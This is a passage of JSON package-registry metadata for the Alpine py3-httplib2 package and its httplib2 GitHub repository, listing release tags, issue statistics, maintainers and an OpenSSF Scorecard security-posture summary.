.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T21:50:41.582Z","dependent_packages_count":4,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":6.546004918963234,"stargazers_count":8.040612978495302,"forks_count":5.328876836728258,"average":4.9788736835466985},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.15","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":180,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-20T00:01:42.342Z","updated_at":"2023-02-20T00:01:42.342Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.15","url":"https://pkgs.alpinelinux.org/packages?branch=v3.15","ecosystem":"alpine","default":false,"packages_count":15857,"maintainers_count":287,"namespaces_count":2,"keywords_count":2466,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":799},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.684Z","updated_at":"2026-08-24T05:06:01.591Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/namespaces"}},{"id":7778932,"name":"py3-httplib2","ecosystem":"alpine","description":"Python3 HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2023-04-19T14:25:43.000Z","latest_release_published_at":"2023-04-19T14:25:43.000Z","latest_release_number":"0.22.0-r1","last_synced_at":"2026-03-10T15:24:14.239Z","created_at":"2023-05-22T14:25:53.408Z","updated_at":"2026-08-21T23:57:46.405Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.18/community/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/